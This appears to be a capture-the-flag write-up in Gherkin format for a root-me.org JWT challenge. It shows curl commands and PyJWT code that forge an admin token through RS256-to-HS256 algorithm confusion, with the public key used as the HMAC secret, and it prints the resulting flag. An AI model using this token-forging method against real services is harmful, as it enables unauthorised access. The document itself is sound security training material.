## Version 2.0
## language: en

Feature:
  Site:
    root-me.org
  Category:
    Web server
  User:
    mr_once
  Goal:
    Get the flag

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.08.01  |
    | Firefox         | 79.0        |
    | Python          | 3.8.5       |
    | PyJWT           | 0.4.3       |
    | curl            | 7.72.0      |
    | base64          | 8.32        |
  Machine information:
    Given I am accessing the challenge at
    """
    challenge01.root-me.org/web-serveur/ch60/
    """
    And the challenge description
    """
    You find an API with 3 endpoints:

      /key (accessible with GET)
      /auth (accessible with POST)
      /admin (accessible with POST)

    There is sure to be important data in the admin section, access it!
    """

  Scenario: Success:Get the public key
    Given I access
    """
    $ curl -XGET challenge01.root-me.org/web-serveur/ch60/key
    """
    Then I can see the public key
    """
    ["-----BEGIN PUBLIC KEY-----",
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4s+YpSjsDaUSDFU5ziLd",
    "OaFYDbz8Cb+CNhG5Xf7FjT8pq6KOINBymttAkGu1IbZB1tVNBARZy9Y/TsLLRx/Y",
    "jnvHSBWHL/qurONY2pH5KFUTxjbXRb/R46Hf5kHk5rNwBz+SgfiL6DWmZ1USibDj",
    "flbDUlKYQRzKlsMUb3Ui+n6z3y01j4phOp6Mgyo0cvGboVocOnA6y+NssIFmt7h6",
    "dRJCiIv4O6Xm7KcEWe7N69alEz8ZJ3haD2ELeSzY/vhET4o+UH+jTSWUjlJKnmS6",
    "dKbJlpz7nSwlPD46FJhjCRoVnpkWQiX2hOGij6xa0BX6swi1EadHuMiVY3M79qwT",
    "sQIDAQAB",
    "-----END PUBLIC KEY-----"]
    """
    When I use python to save the key into the file "key.pem"
    """
    >>> key = ["-----BEGIN PUBLIC KEY-----",...
    >>> key = "\n".join(key)
    >>> with open("key.pem", "w") as public_key:
    ...     public_key.write(key)
    """

  Scenario: Success:Decode the token
    Given I access
    """
    $ curl -XPOST challenge01.root-me.org/web-serveur/ch60/auth
    """
    Then I can see
    """
    {"message": "You have to provide 'username=YOURNAME' in your POST request"}
    """
    When I provide a username
    """
    $ curl -XPOST challenge01.root-me.org/web-serveur/ch60/auth -d\
       "username=test"
    """
    Then I get the response
    """
    {"Here is your token":
      "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QifQ\
      dKZ2Hr6_0KVTMXfS7bcgGsV1fluzvjgyPSZuLuepvjVvYdY4fn7yBX3BicHxwuwPPFHi4ejj\
      1sAtO8jP_3t-63WOypIhMpQEQCCvxDz5xcTwb6Zw8vO00Qp7qFGRiRwTGdgbMXa1u9RNk6iR\
      aZ5b-cxXDxpjFGnOhQAxE7HPbt0BxQK-cEWp7LGLwHokPAhnbpIVeZeWq9Fj0LZ33AT2UoIO\
      xN7e1Cnza2AFETheFdcsf1o_DrsP-zZSDSVN84n7hXPK50IUsLKO8Y231fAndOTK1ySTjqk5\
      DwQMjOfQjeRHpF0zQyMX7rBuuvUTRwvYH2zBcbvFz1gHX7RYGLuP5w",
      "result": "Hello test"}
    """
    When I decode the header
    """
    $ echo eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9 | base64 -d
    """
    Then I get
    """
    {"alg":"RS256","typ":"JWT"}
    """
    When I decode the payload
    """
    echo eyJ1c2VybmFtZSI6InRlc3QifQ | base64 -d
    """
    Then I get
    """
    {"username":"test"}
    """
    And now I know the token is signed using "RS256"
    And the form of the payload

  Scenario: Fail:Use no encryption algorithm
    Given I generate a token with no encryption
    """
    >>> import jwt
    >>> jwt.encode({"username": "admin"}, key=None, algorithm="none")
    b'eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIn0.'
    """
    Then I try it on the site
    """
    $ TOKEN=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIn0.
    $ curl -XPOST -H 'Accept: application/json' -H "Authorization: Bearer \
      ${TOKEN}" http://challenge01.root-me.org/web-serveur/ch60/admin
    """
    And I get
    """
    {"message": "You must be admin to enter here"}
    """

  Scenario: Success:Change RS256 for HS256 and sign with the public key
    Given the token uses "RS256" and I have the public key
    When I use "PyJWT" to generate a new token using "HS256"
    And signed using the private key
    """
    >>> import jwt
    >>> key = open("key.pem", "r").read()
    >>> jwt.encode({"username": "admin"}, key, algorithm="HS256")
    b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.\
    hU_rKaNAZHO70LQrLAzIqEOHkz55pMP3IrtWdz6ggHk'
    """
    Then I try it on the site
    """
    $ TOKEN=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.\
      hU_rKaNAZHO70LQrLAzIqEOHkz55pMP3IrtWdz6ggHk
    $ curl -XPOST -H 'Accept: application/json' -H "Authorization: Bearer \
    ${TOKEN}" http://challenge01.root-me.org/web-serveur/ch60/admin
    """
    And I get the flag
    """
    {"result": "Congrats !! Here is your flag : HardcodeYourAlgoBro"}
    """
